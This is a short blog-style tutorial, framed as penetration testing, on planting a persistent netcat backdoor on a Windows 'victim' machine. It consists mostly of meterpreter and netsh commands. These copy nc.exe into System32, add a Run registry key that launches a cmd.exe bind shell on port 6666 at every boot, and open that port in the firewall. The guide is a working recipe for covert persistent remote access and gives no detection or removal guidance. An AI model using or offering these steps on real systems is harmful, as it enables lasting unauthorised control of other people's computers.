Install Netcat backdoor on Windows machine

by do son ·

nc is the command which runs netcat, a simple Unix utility that reads and writes data across network connections, using the TCP or UDP protocol. It is designed to be a reliable “back-end” tool that can be used directly or driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities. Common uses include:

  • Simple TCP proxies
  • Shell-script based HTTP clients and servers
  • Network daemon testing
  • A Socks or HTTP ProxyCommand for ssh

How to use netcat, please read this articles.

On this post, i am going to guide you how to install netcat backdoor on windows machine for accessing to target machine everytime. This step is on maintaining phase on your penetration testing.

https://www.youtube.com/watch?v=tWIa-MYz7x8

Command:

1. Upload nc.exe to victim

meterpreter > getsystem

meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\Windows\\System32

2. Use meterpreter to modify regedit to make netcat running on system boot

meterpreter > reg setval -k HKLM\\software\\microsoft\\currentversion\\run -v netcat -d 'C:\\Windows\\System32\\nc.exe -Ldp 6666 -e cmd.exe'

3. Set firewall to open port 6666

meterpreter > shell

C:\Windows\system32 > netsh firewall

C:\Windows\system32 > netsh firewall show opmode

C:\Windows\system32 > netsh firewall show portopening

C:\Windows\system32 > netsh advfirewall firewall add rule name="netcat" dir=in action=allow protocol=TCP localport=6666

 

Tags: netcatnetcat backdoor